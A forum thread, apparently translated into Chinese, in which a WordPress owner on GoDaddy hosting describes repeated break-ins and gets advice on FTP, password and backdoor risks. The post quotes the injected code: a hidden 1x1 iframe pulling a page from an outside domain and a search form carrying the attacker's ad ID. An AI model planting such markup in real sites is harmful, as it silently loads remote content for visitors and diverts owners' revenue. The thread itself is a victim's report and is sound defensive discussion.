網站又被黑了
最終更新:
在過去的幾周里,事情一直很平靜,並教會了我更多關於網站安全和風險的知識。這是我的故事版本-
我使用的是舊版本的 wordpress,可能這個人是從Google上抓到我的。我認為這是腳本攻擊。很難說安全性實際上是如何以及何時受到損害的,我在 2009 年 11 月 5 日註意到了這一點。雖然當時我採取了一些安全措施(如下所述),但總有可能我錯過了在更改 wordpress 密碼時我格式化了我的工作電腦。
現在我已經從主機中刪除了所有不需要的 php 腳本,使管理部分只能由我的 IP 訪問,阻止了屬於越南的特定 IP 範圍。每日備份和其他東西。問題是涉及的變數太多,而且很難跟踪每件事。主要課程是為此做好準備。:)
我正在使用 GoDaddy 的共享託管計劃並執行 WordPress 網站。我的網站第一次被黑是在 2009 年 11 月 5 日。當時,黑客用他自己的廣告**替換了我的廣告。**我以為這是因為我對安全的懶惰而發生的,但我錯了。
我格式化了我的電腦並重新設置了一切。將 ESET NOD32 替換為 Microsoft Security Essentials。升級到最新版本的 WordPress。更改了所有密碼。設置一個新的數據庫。以及我在這里和那裡閱讀的其他與安全相關的內容。在我的網站今天再次被黑客入侵之前,事情執行了一段時間。
上次,這傢伙玩了很多文件,專門更改了 footer.php 和所有與廣告相關的文件。但這一次他只是去對了地方並替換為以下程式碼-
<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME> <form action="http://www.google.com/cse" id="cse-search-box"> <div> <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
看起來那個人對操作數據庫等不感興趣,而只是放置程式碼并快速賺錢。Godaddy 轉發了我的 ftp 日誌,並且有來自 IP - 117.2.56.31 的未經授權的訪問。這個 IP 屬於越南,而且http://blackberryrss.com與越南有一些聯繫。
我的帳戶沒有 SSH 訪問權限,我使用 FireFTP 連接到 FTP。這是GoDaddy上次的回复——
在查看您的帳戶後,我們發現您的 FTP 帳戶已被盜用,原因可能是您本地電腦上的惡意軟體或 FTP/主機密碼較弱。
但是我已經更改了所有密碼,刪除了帳戶等,但似乎沒有任何效果。我現在一無所知。請告訴我應該怎麼做?如何防止未經授權訪問我的帳戶??????
額外細節:
- 密碼強度只是強而不是最佳。
- 我個人使用 Windows XP SP3、Windows 防火牆等。在第一次攻擊後,我學會了使用使用者帳戶並避免使用管理員帳戶。
- 當我看到第一次攻擊的 FTP 日誌時,很明顯該人正在手動執行所有這些操作。
請記住,FTP 以明文形式發送您的密碼。所以妥協的可能性是肯定存在的。
要考慮的另一件事是,您的 FTP 密碼對您的主機來說是唯一的嗎?你確定你沒有在其他任何地方使用它嗎?沒有其他帳戶、網站等?
您的 EMAIL 密碼有多安全?我曾參與過這樣的案例:“弱連結”實際上是 EMAIL 密碼,而罪魁禍首只是向電子郵件發送“忘記密碼”並從郵箱中刪除證據,而每個人都忙於關注受感染的伺服器而無法注意。
只是想到了一些事情……當然,其他一些事情將是您的 ISP 的社會工程方法或伺服器上的某些軟體漏洞或您託管的軟體包之一。
還有更多(顯然),但這些通常是“通常的嫌疑人”。
更新:
基於這個新資訊(黑客沒有使用 FTP 來更改您的文件),我只能假設最可能的原因可能是一個不安全的網路應用程序。
這不是唯一可能的事情,但在這種情況下是最有可能的。
要考慮(並檢查)的另一件事是他是否給自己留下了某種“後門”到您的應用程序。我似乎記得你之前提到過你的 ISP 說他是通過 FTP 進來的。有沒有可能他第一次通過FTP進來,給自己留了一個後門?
此外,它是在黑暗中拍攝的,但我親眼目睹了黑客只進入一次但留下了一個不斷更改文件和其他各種邪惡的 cron 工作的受感染盒子。有沒有可能黑客沒有回來而你正在處理一個自動化腳本?只是檢查一下你是否覺得你已經用盡了所有其他可能性。
最後,您是否有權訪問您的網路日誌、系統日誌等?如果是這樣,他們怎麼說?他們有沒有透露任何線索?